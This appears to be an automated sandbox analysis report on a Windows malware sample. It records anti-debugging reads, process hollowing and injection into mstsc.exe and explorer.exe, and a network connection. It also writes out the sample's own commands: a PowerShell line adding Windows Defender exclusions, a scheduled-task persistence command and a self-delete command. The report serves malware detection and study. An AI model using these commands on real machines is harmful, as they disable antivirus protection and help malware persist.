Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]	23_2_04FC4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]	23_2_04FC4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8E620 mov eax, dword ptr fs:[00000030h]	23_2_04F8E620
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA3A1C mov eax, dword ptr fs:[00000030h]	23_2_04FA3A1C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]	23_2_04FBA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]	23_2_04FBA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]	23_2_04F85210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F85210 mov ecx, dword ptr fs:[00000030h]	23_2_04F85210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]	23_2_04F85210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]	23_2_04F85210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]	23_2_04F8AA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]	23_2_04F8AA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F98A0A mov eax, dword ptr fs:[00000030h]	23_2_04F98A0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]	23_2_04F8C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]	23_2_04F8C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]	23_2_04F8C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB8E00 mov eax, dword ptr fs:[00000030h]	23_2_04FB8E00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC37F5 mov eax, dword ptr fs:[00000030h]	23_2_04FC37F5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FADBE9 mov eax, dword ptr fs:[00000030h]	23_2_04FADBE9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]	23_2_04FB03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0503FE3F mov eax, dword ptr fs:[00000030h]	23_2_0503FE3F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05014257 mov eax, dword ptr fs:[00000030h]	23_2_05014257
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]	23_2_04FB4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]	23_2_04FB4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]	23_2_04FB4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]	23_2_0503B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]	23_2_0503B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05058A62 mov eax, dword ptr fs:[00000030h]	23_2_05058A62
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBB390 mov eax, dword ptr fs:[00000030h]	23_2_04FBB390
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2397 mov eax, dword ptr fs:[00000030h]	23_2_04FB2397
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F98794 mov eax, dword ptr fs:[00000030h]	23_2_04F98794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F91B8F mov eax, dword ptr fs:[00000030h]	23_2_04F91B8F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.safifinancial.info
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80

.NET source code references suspicious native API functions

Show sources

Source: Ms5nQdSz5l.exe, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: Ms5nQdSz5l.exe, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: zFVxYeAVOjnwuB.exe.0.dr, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: zFVxYeAVOjnwuB.exe.0.dr, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: 0.0.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: 0.2.Ms5nQdSz5l.exe.c40000.0.unpack, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: 9.0.Ms5nQdSz5l.exe.620000.0.unpack, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, Memory.cs	Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
Source: 9.2.Ms5nQdSz5l.exe.620000.1.unpack, ProcessClass.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Memory written: C:\Users\user\Desktop\Ms5nQdSz5l.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 3472

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: C70000

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'

Source: explorer.exe, 0000000B.00000000.330501605.00000000089FF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000B.00000002.496125004.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000B.00000000.251142593.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Users\user\Desktop\Ms5nQdSz5l.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
